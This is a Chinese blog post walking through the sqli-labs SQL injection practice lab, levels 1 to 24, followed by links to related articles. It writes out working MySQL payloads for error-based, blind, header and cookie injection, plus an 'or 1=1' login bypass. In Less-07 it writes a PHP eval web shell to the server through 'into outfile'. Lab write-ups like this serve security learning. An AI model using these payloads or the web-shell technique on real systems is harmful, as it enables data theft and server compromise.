SQL注入靶场

已于 2024-06-14 14:16:59 修改
阅读量67 收藏 1
点赞数
分类专栏: sql 文章标签: mysql web安全
于 2020-05-11 22:27:49 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yesdmmf/article/details/105919259
版权

Less-01 在这里插入图片描述

在这里插入图片描述

Less-02

同第一题一样,只是在id传参出少了单引号在这里插入图片描述
在这里插入图片描述

Less-03

闭合方式换成了‘)的形式在这里插入图片描述
在这里插入图片描述

Less-04

更换闭合方式在这里插入图片描述
在这里插入图片描述

Less-05

因为会显示数据库报错,可尝试报错注入
1、通过floor报错
and (select 1 from (select count(*),concat((payload),floor(rand(0)*2))x from information_schema.tables group by x)a)
其中payload为要插入的SQL语句,该语句将输出的字符串限制在64个字符
2、通过updatexml报错
and updatexml(1,payload,1)
同样对输出长度做了限制,最长输出32位,该语句只有在payload返回的不是xml格式才会生效
3、通过extractvalue报错
and extractvalue(1,payload)
输出长度限制32位
在这里使用floor报错语句进行注入
and (select 1 from (select count(*),concat(((select database())),floor(rand(0)*2))x from information_schema.tables group by x)a)
在这里插入图片描述在这里插入图片描述

Less-06 同上

在这里插入图片描述在这里插入图片描述

Less-07

这一关是通过写入文件getshell
数据库的file权限规定了数据库用户是否有权限向操作系统内写入和读取已存在的权限,load_file权限默认是不开启的,需要在mysql.ini中有secure_file_priv=配置文件才可以,与DNS注入一样
into outfile命令使用环境:必须知道,服务器上一个可以写入文件的文件夹的完整路径
查看源码,知道闭合方式是‘))
提示我们使用file权限像服务器写入文件,又是本地搭建的环境,那么直接在本机去一个路径就好了
union select 1,2,3 into outfile"C:\\phpStudy\\WWW\\qwe.php"在这里插入图片描述
虽然报了语句错误,可以访问这个文件试试在这里插入图片描述
文件写入成功,那么直接写入一句话木马
union select 1,"<?php @eval($_REQUEST['a']);?>",3 into outfile"C:\\phpStudy\\WWW\\1.php"在这里插入图片描述

Less-08盲注在这里插入图片描述

在这里插入图片描述

Less-09时间盲注在这里插入图片描述

Less-10同上,闭合方式变了在这里插入图片描述

Less-11在这里插入图片描述

使用万能密码’ or 1=1#在这里插入图片描述

Less-12 同上在这里插入图片描述在这里插入图片描述

Less-13报错

报错注入
or (select 1 from (select count(*),concat(((select database())),floor(rand(0)*2))x from information_schema.tables group by x)a)
在这里插入图片描述在这里插入图片描述

Less-14同上

只是闭合方式的变化在这里插入图片描述

Less-15盲注

or length(database())=8#
在这里插入图片描述在这里插入图片描述

Less-16同上在这里插入图片描述

Less-17报错

用updatexml报错注入
or updatexml(1,concat(0x7e,(select database()),0x7e),0)
在这里插入图片描述在这里插入图片描述

Less-18HEAD头注入

在请求头user_agent处注入
在这里插入图片描述在这里插入图片描述

Less-19

这里获取refer请求头的数据,同上在这里插入图片描述

Less-20

获取了cookie处uname的值,在cookie处注入在这里插入图片描述
在这里插入图片描述

Lees-21 base64编码注入

将注入语句进行base64编码,然后用编码后的字符串注入
测试发现,用网上的编码工具不管用,还是需要自己写一段代码进行编译
<?php $a=base64_encode("') union select 1,2,database()#"); echo $a; ?>

在`这里插入图片描述 在这里插入图片描述

Less-22同上在这里插入图片描述

在这里插入图片描述

Less-23

虽然注释被过滤了,但是可以用union select 1,2,database() ‘在这里插入图片描述在这里插入图片描述

Less-24 二次注入

在登录页面login.php,用了mysql_real_escape_string函数进行转义,编码如果不是GBK宽字节注入,这里是不会有注入点了在这里插入图片描述

yesdmmf
关注
专栏目录
JAVA代码审计——SQL注入靶场审计01
m0_61506558的博客
11-09 727
Statementlike '%${in (${selectupdateinsert(二)SQL Lesson 9前面都是sql注入的介绍,我们直接来看到lesson9,首先请求一下看一下前端请求后端的接口地址.全局进行一个搜索,我们首先来看PostMapping那一个代码可以看到直接进行了SQL语句的拼接我们来打个断点分析一下,可以看到我们输入的内容没有经过任何过滤就直接拼接来进去。
sql注入靶场实操
m0_46104808的博客
10-27 1634
sql注入漏洞利用
靶场——SQL注入
最新发布
newqian的博客
08-06 797
接下来不多搞了,总结一下,get和post区别不大,都是看反馈选择对应的注入方式,不过一个主要靠地址栏,一个看from菜单输入,根据不同需求选择注入方式,联合查询就是一起查,全部一起显示,不过要注意长度限制,和表名列名获取等等。利用文件导入的方式进行注入,不过条件苛刻,首先要有root权限,接着需要知道网站路径,最后还需要一个为空,就真的是空的,不是null,由于条件过于苛刻,因此很少见(其原理就是利用其先上传再删除的机制,可以与程序抢进程,使其上传到上级目录,这样即使原目录的文件删除也没用)
sql注入靶场实操
weixin_45711977的博客
06-23 3637
sql注入靶场实操
SQL注入——————pikachu靶场
qq_61579604的博客
10-16 270
修改后。
sql注入---sqli靶场1-9
weixin_72202802的博客
05-07 585
SQL注入是比较常见的网络攻击方式之一,它不是利用操作系统的BUG来实现攻击,而是针对程序员编写时的疏忽,通过SQL语句,实现无账号登录,甚至篡改数据库。
sql注入靶场.zip
06-24
这个"sql注入靶场.zip"文件包含了一个名为"sqli-labs-master"的靶场,旨在帮助学习者了解、实践和防御SQL注入攻击。靶场通常由一系列逐步增加难度的挑战组成,让学习者通过实际操作来提升自己的安全技能。 靶场的...
PHP、Apache环境中部署sqli-labs(SQL注入靶场
01-08
PHP、Apache 环境中部署 sqli-labs(SQL 注入靶场) 知识点 1: sqli-labs 介绍 sqli-labs 是一款开源的练习 SQL 注入的靶场工具,用 PHP 代码编写而成。它需要 PHP 和 Apache 环境运行。sqli-labs 提供了一个实践 ...
掌控安全学院SQL注入靶场
qaq517384的博客
11-18 3802
总体没啥难度,也没有啥过滤,拿来复健感觉还不错,最后一个宽字节注入又花了点时间研究了一下
Web安全漏洞专项靶场SQL注入—docker环境—sqli-labs靶场—详细通关指南
qq_38678845的博客
01-22 2387
Web安全SQL注入漏洞的专项训练
【精选详细】sql-labs通关(SQL注入11-25)
weixin_67832625的博客
07-28 1444
sqli-labs靶场适合于初学sql注入的新手,它包含了许多的场景和模式为练习者提供良好的练习平台,以下这些语句搞懂我们做靶场就如鱼得水,非常自信的可以完成。
SQL注入看这一篇可能还不够——SQL注入各类型总结+靶场实战
云舒的博客
05-31 2725
SQL注入简介 SQL注入原理 SQL注入是通过将恶意的sql语句插入到应用代码中,由于过滤不严导致的在后台执行恶意sql语句而产生的漏洞。 SQL注入类型 注入参数:数字型注入、字符型注入、搜索型注入 注入方法:基于报错、基于布尔盲注、基于时间盲注、联合查询、堆叠注入、内联查询注入、宽字节注入 提交方式:GET注入、POST注入、COOKIE注入、HTTP头注入 (一)SQL注入流程(联合注入) 源码分析 这里以sqli-lab靶场第一关为例,进行实例注入。 源码分析是写给新手阅读的,大佬请跳过。 首
SQL注入原理
weixin_50340347的博客
06-15 1391
SQL注入靶场平台使用的是sqli。它是一个针对SQL注入的专项联系平台。搭建和安装比较简单,可以自习查询相关教程。
WEB常见漏洞之SQL注入靶场篇—1)
One-Fox安全团队的博客
05-05 4002
sqli靶场版SqliLabs 是一个学习 SQL 注入的靶场,它提供了 GET 和 POST 的实验场景,涵盖了联合查询注入、基于报错的注入、基于时间的盲注、基于布尔的盲注、堆叠注入、二次注入以及各种注入绕过。
SQL注入靶场通关
热门推荐
龙卷风摧毁停车场
04-08 1万+
SQL注入靶场通关 SQL注入简介 SQL注入是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。 SQL注入原理 SQL注入攻击是通过操作输入来修改SQL语句,用以达到执行代码对WEB服务器进行攻击的方法。就是在post/getweb表单、输入域名或页面请求的查询字符串中插入SQL命令,使web服务器执行恶意命
DVWA靶场SQL注入通关详解,2024年最新零基础如何成为高级网络安全开发
04-17 982
获取表中的字段名,当输入查询语句(1 union select 1,column_name from information_schema.columns where table_name=‘users’)后,会发现报错了,原因是语句中含有单引号。接下来判断字段数,当查询语句为1 or 1=1 order by 2时,页面能正常显示,但是当把2换成3时,页面就会报错,因此这里的字段数为2。然后再输入1’页面错误,说明页面没有对1’进行过滤,也就是说攻击者可以对数据库进行操作。如下图所示,回显位置为第二个。
sqlilabs靶场1—20题学习笔记(思路+解析+方法)
2301_79355407的博客
04-16 2231
此文章为初学者在学习SQL注入使用sqlilabs靶场的学习笔记,均为手工注入,未使用sqlmap。有很多出错以及不懂的地方。此文章会不断补充和更正。
Burpsuite靶场——SQL注入
小林说安全的博客
05-13 4737
Burpsuite靶场——SQL注入漏洞详解,带你了解并从根源上解决SQL注入问题。
解决updatexml和extractvalue查询显示不全
m0_63521991的博客
02-18 786
updatexml() 函数和extractvalue()的报错内容长度不能超过 32 个字符,当我们查询的内容较短时可以完整显示,若查询内容较长,则导致我们要查询的的内容显示不全。limit函数包含两个参数,第一个参数表示行,第二个参数表示列,我们可以通过换参,逐个查看。limit 1 1 2 1 3 1 数据少了挨个试 数据多了写脚本。方式,通过注入代码,触发数据库的错误响应,并从错误信息中获取有用的信息。我们可以使用 limit或者分段显示的方式来解决。报错注入是一种常见的。
sql注入靶场源代码示例
07-27
下面是一个简单的PHP靶场源代码示例,这个例子展示了如何创建一个基本的登录表单,如果没有正确过滤用户输入就容易受到SQL注入攻击: ```php // 错误开启以便于查看 error_reporting(E_ALL); // 假设这是你的...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值